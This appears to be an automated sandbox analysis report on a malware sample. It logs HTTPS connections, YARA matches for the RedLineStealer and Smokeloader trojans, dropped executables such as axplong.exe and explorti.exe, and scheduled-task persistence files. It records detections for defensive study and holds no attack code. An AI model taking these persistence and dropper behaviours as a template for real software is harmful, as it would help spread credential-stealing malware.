Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64268
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64149
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64148
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64269
Source: unknown Network traffic detected: HTTP traffic on port 64328 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64280
Source: unknown Network traffic detected: HTTP traffic on port 64236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64040
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64282
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64281
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64284
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64162
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64283
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64286
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64285
Source: unknown Network traffic detected: HTTP traffic on port 64351 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64306 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64329 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64155
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64279
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64278
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64291
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64290
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64051
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64293
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64292
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64295
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64097 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64149 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64155 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 18.65.39.112:443 -> 192.168.2.5:64195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:64197 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64199 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64202 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64216 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64214 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64218 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64223 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64219 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64265 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64267 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64268 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64269 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64272 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64276 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64280 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64279 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64291 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64288 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64293 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64287 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64310 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64315 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64312 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64314 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64319 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64320 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64323 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64325 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64327 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64328 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64332 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64330 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64331 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64334 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64333 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64335 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64337 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64336 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64339 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64340 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64338 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64341 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64343 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64342 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64344 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64345 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64346 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64348 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64351 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64353 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64354 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64355 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64356 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64357 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64358 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64359 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64360 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64361 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64362 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64364 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64365 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64363 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64366 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64367 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64368 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64369 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64372 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64373 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64375 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64377 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
PE file contains section with special chars
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: .idata
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5EB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C5EB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C5EB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C58F280
Creates files inside the system directory
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5835A0 0_2_6C5835A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F545C 0_2_6C5F545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595440 0_2_6C595440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C5C10 0_2_6C5C5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D2C10 0_2_6C5D2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FAC00 0_2_6C5FAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F542B 0_2_6C5F542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AD4D0 0_2_6C5AD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5964C0 0_2_6C5964C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C6CF0 0_2_6C5C6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58D4E0 0_2_6C58D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596C80 0_2_6C596C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E34A0 0_2_6C5E34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EC4A0 0_2_6C5EC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B0512 0_2_6C5B0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AED10 0_2_6C5AED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59FD00 0_2_6C59FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C0DD0 0_2_6C5C0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E85F0 0_2_6C5E85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A9E50 0_2_6C5A9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C3E50 0_2_6C5C3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D2E4E 0_2_6C5D2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A4640 0_2_6C5A4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58C670 0_2_6C58C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F6E63 0_2_6C5F6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C7E10 0_2_6C5C7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D5600 0_2_6C5D5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9E30 0_2_6C5E9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58BEF0 0_2_6C58BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59FEF0 0_2_6C59FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F76E3 0_2_6C5F76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A5E90 0_2_6C5A5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EE680 0_2_6C5EE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E4EA0 0_2_6C5E4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C7710 0_2_6C5C7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C599F00 0_2_6C599F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B6FF0 0_2_6C5B6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58DFE0 0_2_6C58DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D77A0 0_2_6C5D77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A8850 0_2_6C5A8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AD850 0_2_6C5AD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CF070 0_2_6C5CF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C597810 0_2_6C597810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CB820 0_2_6C5CB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D4820 0_2_6C5D4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F50C7 0_2_6C5F50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AC0E0 0_2_6C5AC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C58E0 0_2_6C5C58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B60A0 0_2_6C5B60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AA940 0_2_6C5AA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB970 0_2_6C5DB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FB170 0_2_6C5FB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59D960 0_2_6C59D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C5190 0_2_6C5C5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E2990 0_2_6C5E2990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BD9B0 0_2_6C5BD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58C9A0 0_2_6C58C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C9A60 0_2_6C5C9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C8AC0 0_2_6C5C8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A1AF0 0_2_6C5A1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CE2F0 0_2_6C5CE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FBA90 0_2_6C5FBA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59CAB0 0_2_6C59CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F2AB0 0_2_6C5F2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5822A0 0_2_6C5822A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B4AA0 0_2_6C5B4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C585340 0_2_6C585340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59C370 0_2_6C59C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CD320 0_2_6C5CD320
